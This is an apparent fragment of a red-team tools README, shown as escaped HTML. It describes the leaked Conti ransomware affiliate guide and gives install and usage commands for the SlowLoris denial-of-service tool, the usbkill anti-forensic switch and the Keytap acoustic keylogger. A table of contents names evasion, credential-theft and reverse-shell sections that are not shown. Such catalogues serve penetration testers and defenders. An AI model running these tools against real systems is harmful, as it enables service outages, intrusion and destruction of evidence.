dir=\"auto\"\u003eConti has been responsible for a number of high-profile ransomware attacks, including ones against the computer systems of the City of Pensacola, Florida, and 
the computer systems of the Irish health service.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe \u003ca href=\"https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak\"\u003eConti Pentester Guide Leak - Repository\u003c/a\u003e contains leaked pentesting materials given to Conti ransomware group affiliates.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTopics include:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eConfiguring Rclone with MEGA for data exfiltration\u003c/li\u003e\n\u003cli\u003eConfiguring AnyDesk as persistence and remote access into a victim’s network\u003c/li\u003e\n\u003cli\u003eElevating and gaining admin rights inside a company’s hacked network\u003c/li\u003e\n\u003cli\u003eTaking over domain controllers\u003c/li\u003e\n\u003cli\u003eDumping passwords from Active Directory\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003e\u003ca href=\"https://www.vx-underground.org/\" rel=\"nofollow\"\u003evx-underground.org\u003c/a\u003e obtained more training materials and tools used by Conti ransomware operators \u003ca href=\"https://share.vx-underground.org/Conti/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak\"\u003ehttps://github.com/ForbiddenProgrammer/conti-pentester-guide-leak\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" 
class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/gkbrk/slowloris\"\u003eSlowLoris\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-slowloris\" class=\"anchor\" aria-label=\"Permalink: 🔙SlowLoris\" href=\"#slowloris\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSlowloris is a type of denial-of-service (DoS) attack that involves sending HTTP requests to a web server in a way that ties up the server's resources, preventing it from being able to process legitimate requests.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis attack would typically be conducted with a botnet, it is designed to be difficult to detect and mitigate, as it uses a relatively small number of connections and does not generate a large amount of traffic.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Pip)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo pip3 install slowloris\"\u003e\u003cpre\u003esudo pip3 install slowloris\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: 
(Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/gkbrk/slowloris.git\ncd slowloris\"\u003e\u003cpre\u003egit clone https://github.com/gkbrk/slowloris.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e slowloris\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Pip\nslowloris example.comr\n\n# Git\npython3 slowloris.py example.com\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Pip\u003c/span\u003e\nslowloris example.comr\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Git\u003c/span\u003e\npython3 slowloris.py example.com\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/hephaest0s/usbkill\"\u003eusbkill\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-usbkill\" class=\"anchor\" aria-label=\"Permalink: 🔙usbkill\" href=\"#usbkill\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 
3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis is an anti-forensic kill-switch that waits for a change in USB port status, immediately shutting down endpoint if a change is detected.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIn some situations, it is imperative that no data is added or removed from an endpoint via USB.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis is where USBkill comes in.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/hephaest0s/usbkill\ncd usbkill\n./setup.py install\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/hephaest0s/usbkill\ncd usbkill\n./setup.py install\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo python3 usbkill.py\"\u003e\u003cpre\u003esudo python3 usbkill.py\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png\"\u003e\u003cimg 
src=\"https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://en.wikipedia.org/wiki/USBKill\" rel=\"nofollow\"\u003ehttps://en.wikipedia.org/wiki/USBKill\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/ggerganov/kbd-audio\"\u003eKeytap\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-keytap\" class=\"anchor\" aria-label=\"Permalink: 🔙Keytap\" href=\"#keytap\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis is a tool that can guess the pressed keyboard keys from the audio of a computer's microphone.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eKeytap2 can also be used to retrieve text from audio snippets of keyboard typing.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Build)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" 
data-snippet-clipboard-copy-content=\"git clone https://github.com/ggerganov/kbd-audio\ncd kbd-audio\ngit submodule update --init\nmkdir build \u0026amp;\u0026amp; cd build\ncmake ..\nmake\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/ggerganov/kbd-audio\ncd kbd-audio\ngit submodule update --init\nmkdir build \u0026amp;\u0026amp; cd build\ncmake ..\nmake\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Record audio to a raw binary file on disk\n./record-full output.kbd [-cN]\n\n# Playback a recording captured via the record-full tool\n./play-full input.kbd [-pN]\n\n# Record audio only while typing (Useful for collecting training data for keytap)\n./record output.kbd [-cN] [-CN]\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Record audio to a raw binary file on disk\u003c/span\u003e\n./record-full output.kbd [-cN]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Playback a recording captured via the record-full tool\u003c/span\u003e\n./play-full input.kbd [-pN]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Record audio only while typing (Useful for collecting training data for keytap)\u003c/span\u003e\n./record output.kbd [-cN] [-CN]\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSee full usage documentation \u003ca href=\"https://github.com/ggerganov/kbd-audio#tool-details\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTry the online demo at \u003ca href=\"https://keytap.ggerganov.com/\" rel=\"nofollow\"\u003ehttps://keytap.ggerganov.com/\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" 
rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/ggerganov/kbd-audio\"\u003ehttps://github.com/ggerganov/kbd-audio\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003c/article\u003e","loaded":true,"timedOut":false,"errorMessage":null,"headerInfo":{"toc":[{"level":1,"text":"RedTeam-Tools","anchor":"redteam-tools","htmlText":"RedTeam-Tools"},{"level":1,"text":"Tool List","anchor":"tool-list","htmlText":"Tool List"},{"level":1,"text":"Red Team Tips","anchor":"red-team-tips","htmlText":"Red Team Tips"},{"level":3,"text":"🔙Improved HTML smuggling with mouse move eventlistener","anchor":"improved-html-smuggling-with-mouse-move-eventlistener","htmlText":"🔙Improved HTML smuggling with mouse move eventlistener"},{"level":3,"text":"🔙Google translate for phishing","anchor":"google-translate-for-phishing","htmlText":"🔙Google translate for phishing"},{"level":3,"text":"🔙Hiding the local admin account","anchor":"hiding-the-local-admin-account","htmlText":"🔙Hiding the local admin account"},{"level":3,"text":"🔙Cripple windows defender by deleting signatures","anchor":"cripple-windows-defender-by-deleting-signatures","htmlText":"🔙Cripple windows defender by deleting signatures"},{"level":3,"text":"🔙Enable multiple RDP sessions per user","anchor":"enable-multiple-rdp-sessions-per-user","htmlText":"🔙Enable multiple RDP sessions per user"},{"level":3,"text":"🔙Sysinternals PsExec.exe local alternative","anchor":"sysinternals-psexecexe-local-alternative","htmlText":"🔙Sysinternals PsExec.exe local alternative"},{"level":3,"text":"🔙Live off the land port 
scanner","anchor":"live-off-the-land-port-scanner","htmlText":"🔙Live off the land port scanner"},{"level":3,"text":"🔙Proxy aware PowerShell DownloadString","anchor":"proxy-aware-powershell-downloadstring","htmlText":"🔙Proxy aware PowerShell DownloadString"},{"level":3,"text":"🔙Looking for internal endpoints in browser bookmarks","anchor":"looking-for-internal-endpoints-in-browser-bookmarks","htmlText":"🔙Looking for internal endpoints in browser bookmarks"},{"level":3,"text":"🔙Query DNS records for enumeration","anchor":"query-dns-records-for-enumeration","htmlText":"🔙Query DNS records for enumeration"},{"level":3,"text":"🔙Unquoted service paths without PowerUp","anchor":"unquoted-service-paths-without-powerup","htmlText":"🔙Unquoted service paths without PowerUp"},{"level":3,"text":"🔙Bypass a disabled command prompt with /k","anchor":"bypass-a-disabled-command-prompt-with-k","htmlText":"🔙Bypass a disabled command prompt with /k"},{"level":3,"text":"🔙Stop windows defender deleting mimikatz.exe","anchor":"stop-windows-defender-deleting-mimikatzexe","htmlText":"🔙Stop windows defender deleting mimikatz.exe"},{"level":3,"text":"🔙Check if you are in a virtual machine","anchor":"check-if-you-are-in-a-virtual-machine","htmlText":"🔙Check if you are in a virtual machine"},{"level":3,"text":"🔙Enumerate AppLocker rules","anchor":"enumerate-applocker-rules","htmlText":"🔙Enumerate AppLocker rules"},{"level":3,"text":"🔙CMD shortcut with 6 pixels via mspaint","anchor":"cmd-shortcut-with-6-pixels-via-mspaint","htmlText":"🔙CMD shortcut with 6 pixels via mspaint"},{"level":3,"text":"🔙Link spoofing with PreventDefault JavaScript method","anchor":"link-spoofing-with-preventdefault-javascript-method","htmlText":"🔙Link spoofing with PreventDefault JavaScript method"},{"level":3,"text":"🔙Check SMB firewall rules with Responder","anchor":"check-smb-firewall-rules-with-responder","htmlText":"🔙Check SMB firewall rules with Responder"},{"level":3,"text":"🔙Disable AV with SysInternals 
PsSuspend","anchor":"disable-av-with-sysinternals-pssuspend","htmlText":"🔙Disable AV with SysInternals PsSuspend"},{"level":1,"text":"Reconnaissance","anchor":"reconnaissance","htmlText":"Reconnaissance"},{"level":3,"text":"🔙spiderfoot","anchor":"spiderfoot","htmlText":"🔙spiderfoot"},{"level":3,"text":"🔙reconftw","anchor":"reconftw","htmlText":"🔙reconftw"},{"level":3,"text":"🔙subzy","anchor":"subzy","htmlText":"🔙subzy"},{"level":3,"text":"🔙smtp-user-enum","anchor":"smtp-user-enum","htmlText":"🔙smtp-user-enum"},{"level":3,"text":"🔙crt.sh -\u003e httprobe -\u003e EyeWitness","anchor":"crtsh---httprobe---eyewitness","htmlText":"🔙crt.sh -\u0026gt; httprobe -\u0026gt; EyeWitness"},{"level":3,"text":"🔙jsendpoints","anchor":"jsendpoints","htmlText":"🔙jsendpoints"},{"level":3,"text":"🔙nuclei","anchor":"nuclei","htmlText":"🔙nuclei"},{"level":3,"text":"🔙certSniff","anchor":"certsniff","htmlText":"🔙certSniff"},{"level":3,"text":"🔙gobuster","anchor":"gobuster","htmlText":"🔙gobuster"},{"level":3,"text":"🔙feroxbuster","anchor":"feroxbuster","htmlText":"🔙feroxbuster"},{"level":3,"text":"🔙CloudBrute","anchor":"cloudbrute","htmlText":"🔙CloudBrute"},{"level":3,"text":"🔙dnsrecon","anchor":"dnsrecon","htmlText":"🔙dnsrecon"},{"level":3,"text":"🔙shodan.io","anchor":"shodanio","htmlText":"🔙shodan.io"},{"level":3,"text":"🔙AORT","anchor":"aort","htmlText":"🔙AORT"},{"level":3,"text":"🔙spoofcheck","anchor":"spoofcheck","htmlText":"🔙spoofcheck"},{"level":3,"text":"🔙AWSBucketDump","anchor":"awsbucketdump","htmlText":"🔙AWSBucketDump"},{"level":3,"text":"🔙GitHarvester","anchor":"githarvester","htmlText":"🔙GitHarvester"},{"level":3,"text":"🔙truffleHog","anchor":"trufflehog","htmlText":"🔙truffleHog"},{"level":3,"text":"🔙Dismap","anchor":"dismap","htmlText":"🔙Dismap"},{"level":3,"text":"🔙enum4linux","anchor":"enum4linux","htmlText":"🔙enum4linux"},{"level":3,"text":"🔙skanuvaty","anchor":"skanuvaty","htmlText":"🔙skanuvaty"},{"level":3,"text":"🔙Metabigor","anchor":"metabigor","htmlText":"🔙Metabigor"},{
"level":3,"text":"🔙Gitrob","anchor":"gitrob","htmlText":"🔙Gitrob"},{"level":3,"text":"🔙gowitness","anchor":"gowitness","htmlText":"🔙gowitness"},{"level":1,"text":"Resource Development","anchor":"resource-development","htmlText":"Resource Development"},{"level":3,"text":"🔙remoteInjector","anchor":"remoteinjector","htmlText":"🔙remoteInjector"},{"level":3,"text":"🔙Chimera","anchor":"chimera","htmlText":"🔙Chimera"},{"level":3,"text":"🔙msfvenom","anchor":"msfvenom","htmlText":"🔙msfvenom"},{"level":4,"text":"Msfvenom Commands","anchor":"msfvenom-commands","htmlText":"Msfvenom Commands"},{"level":3,"text":"🔙Shellter","anchor":"shellter","htmlText":"🔙Shellter"},{"level":3,"text":"🔙Freeze","anchor":"freeze","htmlText":"🔙Freeze"},{"level":3,"text":"🔙WordSteal","anchor":"wordsteal","htmlText":"🔙WordSteal"},{"level":3,"text":"🔙NTAPI Undocumented Functions","anchor":"ntapi-undocumented-functions","htmlText":"🔙NTAPI Undocumented Functions"},{"level":3,"text":"🔙Kernel Callback Functions","anchor":"kernel-callback-functions","htmlText":"🔙Kernel Callback Functions"},{"level":3,"text":"🔙OffensiveVBA","anchor":"offensivevba","htmlText":"🔙OffensiveVBA"},{"level":3,"text":"🔙WSH","anchor":"wsh","htmlText":"🔙WSH"},{"level":3,"text":"🔙HTA","anchor":"hta","htmlText":"🔙HTA"},{"level":3,"text":"🔙VBA","anchor":"vba","htmlText":"🔙VBA"},{"level":1,"text":"Initial Access","anchor":"initial-access","htmlText":"Initial Access"},{"level":3,"text":"🔙CredMaster","anchor":"credmaster","htmlText":"🔙CredMaster"},{"level":3,"text":"🔙TREVORspray","anchor":"trevorspray","htmlText":"🔙TREVORspray"},{"level":3,"text":"🔙evilqr","anchor":"evilqr","htmlText":"🔙evilqr"},{"level":3,"text":"🔙CUPP","anchor":"cupp","htmlText":"🔙CUPP"},{"level":3,"text":"🔙Bash Bunny","anchor":"bash-bunny","htmlText":"🔙Bash Bunny"},{"level":3,"text":"🔙EvilGoPhish","anchor":"evilgophish","htmlText":"🔙EvilGoPhish"},{"level":3,"text":"🔙Social Engineer Toolkit (SET)","anchor":"social-engineer-toolkit-set","htmlText":"🔙Social Engineer 
Toolkit (SET)"},{"level":3,"text":"🔙Hydra","anchor":"hydra","htmlText":"🔙Hydra"},{"level":3,"text":"🔙SquarePhish","anchor":"squarephish","htmlText":"🔙SquarePhish"},{"level":3,"text":"🔙King Phisher","anchor":"king-phisher","htmlText":"🔙King Phisher"},{"level":1,"text":"Execution","anchor":"execution","htmlText":"Execution"},{"level":3,"text":"🔙Responder","anchor":"responder","htmlText":"🔙Responder"},{"level":3,"text":"🔙secretsdump","anchor":"secretsdump","htmlText":"🔙secretsdump"},{"level":3,"text":"🔙evil-winrm","anchor":"evil-winrm","htmlText":"🔙evil-winrm"},{"level":3,"text":"🔙Donut","anchor":"donut","htmlText":"🔙Donut"},{"level":3,"text":"🔙Macro_pack","anchor":"macro_pack","htmlText":"🔙Macro_pack"},{"level":3,"text":"🔙PowerSploit","anchor":"powersploit","htmlText":"🔙PowerSploit"},{"level":3,"text":"🔙Rubeus","anchor":"rubeus","htmlText":"🔙Rubeus"},{"level":3,"text":"🔙SharpUp","anchor":"sharpup","htmlText":"🔙SharpUp"},{"level":3,"text":"🔙SQLRecon","anchor":"sqlrecon","htmlText":"🔙SQLRecon"},{"level":3,"text":"🔙UltimateAppLockerByPassList","anchor":"ultimateapplockerbypasslist","htmlText":"🔙UltimateAppLockerByPassList"},{"level":3,"text":"🔙StarFighters","anchor":"starfighters","htmlText":"🔙StarFighters"},{"level":3,"text":"🔙demiguise","anchor":"demiguise","htmlText":"🔙demiguise"},{"level":2,"text":"🔙PowerZure","anchor":"powerzure","htmlText":"🔙PowerZure"},{"level":1,"text":"Persistence","anchor":"persistence","htmlText":"Persistence"},{"level":3,"text":"🔙Impacket","anchor":"impacket","htmlText":"🔙Impacket"},{"level":3,"text":"🔙Empire","anchor":"empire","htmlText":"🔙Empire"},{"level":3,"text":"🔙SharPersist","anchor":"sharpersist","htmlText":"🔙SharPersist"},{"level":3,"text":"🔙ligolo-ng","anchor":"ligolo-ng","htmlText":"🔙ligolo-ng"},{"level":1,"text":"Privilege Escalation","anchor":"privilege-escalation","htmlText":"Privilege 
Escalation"},{"level":3,"text":"🔙Crassus","anchor":"crassus","htmlText":"🔙Crassus"},{"level":3,"text":"🔙LinPEAS","anchor":"linpeas","htmlText":"🔙LinPEAS"},{"level":3,"text":"🔙WinPEAS","anchor":"winpeas","htmlText":"🔙WinPEAS"},{"level":3,"text":"🔙linux-smart-enumeration","anchor":"linux-smart-enumeration","htmlText":"🔙linux-smart-enumeration"},{"level":3,"text":"🔙Certify","anchor":"certify","htmlText":"🔙Certify"},{"level":3,"text":"🔙Get-GPPPassword","anchor":"get-gpppassword","htmlText":"🔙Get-GPPPassword"},{"level":3,"text":"🔙Sherlock","anchor":"sherlock","htmlText":"🔙Sherlock"},{"level":3,"text":"🔙Watson","anchor":"watson","htmlText":"🔙Watson"},{"level":3,"text":"🔙ImpulsiveDLLHijack","anchor":"impulsivedllhijack","htmlText":"🔙ImpulsiveDLLHijack"},{"level":3,"text":"🔙ADFSDump","anchor":"adfsdump","htmlText":"🔙ADFSDump"},{"level":3,"text":"🔙BeRoot","anchor":"beroot","htmlText":"🔙BeRoot"},{"level":1,"text":"Defense Evasion","anchor":"defense-evasion","htmlText":"Defense Evasion"},{"level":3,"text":"🔙Invoke-Obfuscation","anchor":"invoke-obfuscation","htmlText":"🔙Invoke-Obfuscation"},{"level":3,"text":"🔙Veil","anchor":"veil","htmlText":"🔙Veil"},{"level":3,"text":"🔙SharpBlock","anchor":"sharpblock","htmlText":"🔙SharpBlock"},{"level":3,"text":"🔙Alcatraz","anchor":"alcatraz","htmlText":"🔙Alcatraz"},{"level":3,"text":"🔙Mangle","anchor":"mangle","htmlText":"🔙Mangle"},{"level":3,"text":"🔙AMSI Fail","anchor":"amsi-fail","htmlText":"🔙AMSI Fail"},{"level":3,"text":"🔙ScareCrow","anchor":"scarecrow","htmlText":"🔙ScareCrow"},{"level":3,"text":"🔙moonwalk","anchor":"moonwalk","htmlText":"🔙moonwalk"},{"level":1,"text":"Credential Access","anchor":"credential-access","htmlText":"Credential Access"},{"level":3,"text":"🔙Mimikatz","anchor":"mimikatz","htmlText":"🔙Mimikatz"},{"level":3,"text":"🔙LaZagne","anchor":"lazagne","htmlText":"🔙LaZagne"},{"level":3,"text":"🔙hashcat","anchor":"hashcat","htmlText":"🔙hashcat"},{"level":3,"text":"🔙John the 
Ripper","anchor":"john-the-ripper","htmlText":"🔙John the Ripper"},{"level":3,"text":"🔙SCOMDecrypt","anchor":"scomdecrypt","htmlText":"🔙SCOMDecrypt"},{"level":3,"text":"🔙nanodump","anchor":"nanodump","htmlText":"🔙nanodump"},{"level":3,"text":"🔙eviltree","anchor":"eviltree","htmlText":"🔙eviltree"},{"level":3,"text":"🔙SeeYouCM-Thief","anchor":"seeyoucm-thief","htmlText":"🔙SeeYouCM-Thief"},{"level":3,"text":"🔙MailSniper","anchor":"mailsniper","htmlText":"🔙MailSniper"},{"level":3,"text":"🔙SharpChromium","anchor":"sharpchromium","htmlText":"🔙SharpChromium"},{"level":3,"text":"🔙dploot","anchor":"dploot","htmlText":"🔙dploot"},{"level":1,"text":"Discovery","anchor":"discovery","htmlText":"Discovery"},{"level":3,"text":"🔙PCredz","anchor":"pcredz","htmlText":"🔙PCredz"},{"level":3,"text":"🔙PingCastle","anchor":"pingcastle","htmlText":"🔙PingCastle"},{"level":3,"text":"🔙Seatbelt","anchor":"seatbelt","htmlText":"🔙Seatbelt"},{"level":3,"text":"🔙ADRecon","anchor":"adrecon","htmlText":"🔙ADRecon"},{"level":3,"text":"🔙adidnsdump","anchor":"adidnsdump","htmlText":"🔙adidnsdump"},{"level":3,"text":"🔙kerbrute","anchor":"kerbrute","htmlText":"🔙kerbrute"},{"level":3,"text":"🔙scavenger","anchor":"scavenger","htmlText":"🔙scavenger"},{"level":1,"text":"Lateral Movement","anchor":"lateral-movement","htmlText":"Lateral Movement"},{"level":3,"text":"🔙crackmapexec","anchor":"crackmapexec","htmlText":"🔙crackmapexec"},{"level":3,"text":"🔙WMIOps","anchor":"wmiops","htmlText":"🔙WMIOps"},{"level":3,"text":"🔙PowerLessShell","anchor":"powerlessshell","htmlText":"🔙PowerLessShell"},{"level":3,"text":"🔙PsExec","anchor":"psexec","htmlText":"🔙PsExec"},{"level":3,"text":"🔙LiquidSnake","anchor":"liquidsnake","htmlText":"🔙LiquidSnake"},{"level":3,"text":"🔙Enabling RDP","anchor":"enabling-rdp","htmlText":"🔙Enabling RDP"},{"level":3,"text":"🔙Upgrading shell to meterpreter","anchor":"upgrading-shell-to-meterpreter","htmlText":"🔙Upgrading shell to meterpreter"},{"level":3,"text":"🔙Forwarding 
Ports","anchor":"forwarding-ports","htmlText":"🔙Forwarding Ports"},{"level":3,"text":"🔙Jenkins reverse shell","anchor":"jenkins-reverse-shell","htmlText":"🔙Jenkins reverse shell"},{"level":3,"text":"🔙ADFSpoof","anchor":"adfspoof","htmlText":"🔙ADFSpoof"},{"level":3,"text":"🔙Coercer","anchor":"coercer","htmlText":"🔙Coercer"},{"level":1,"text":"Collection","anchor":"collection","htmlText":"Collection"},{"level":3,"text":"🔙BloodHound","anchor":"bloodhound","htmlText":"🔙BloodHound"},{"level":3,"text":"🔙Snaffler","anchor":"snaffler","htmlText":"🔙Snaffler"},{"level":3,"text":"🔙linWinPwn","anchor":"linwinpwn","htmlText":"🔙linWinPwn"},{"level":1,"text":"Command and Control","anchor":"command-and-control","htmlText":"Command and Control"},{"level":3,"text":"🔙Living Off Trusted Sites Project","anchor":"living-off-trusted-sites-project","htmlText":"🔙Living Off Trusted Sites Project"},{"level":3,"text":"🔙Havoc","anchor":"havoc","htmlText":"🔙Havoc"},{"level":3,"text":"🔙Covenant","anchor":"covenant","htmlText":"🔙Covenant"},{"level":3,"text":"🔙Merlin","anchor":"merlin","htmlText":"🔙Merlin"},{"level":3,"text":"🔙Metasploit 